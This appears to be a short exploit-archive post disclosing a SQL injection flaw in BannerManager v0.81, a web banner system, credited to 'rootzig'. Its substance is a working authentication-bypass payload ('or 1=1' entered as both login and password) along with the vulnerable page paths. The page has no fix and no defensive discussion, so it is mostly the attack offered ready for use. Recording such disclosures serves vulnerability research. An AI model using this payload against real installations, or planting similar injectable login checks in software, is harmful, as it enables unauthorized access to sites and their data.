BannerManager version 0.81 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
5304872671334ac09bb7e330c1eebd9c#################################################
# #
# SISTEMA DE BANNER: BannerManager v0.81 #
# http://sourceforge.net/projects/bannermanager #
# -------------------------------------- #
# vulnerable: sql injection :) #
# Found by: rootzig #
# -------------------------------------- #
#################################################
Greetz: Eviwrite :P
-------------------
-----------------------------------------
/Banner/default.asp
/[patch]/default.asp
-----------------------------------------
Login: or 1=1
Pass : or 1=1
-----------------------------------------
Comments
No comments yet, be the first!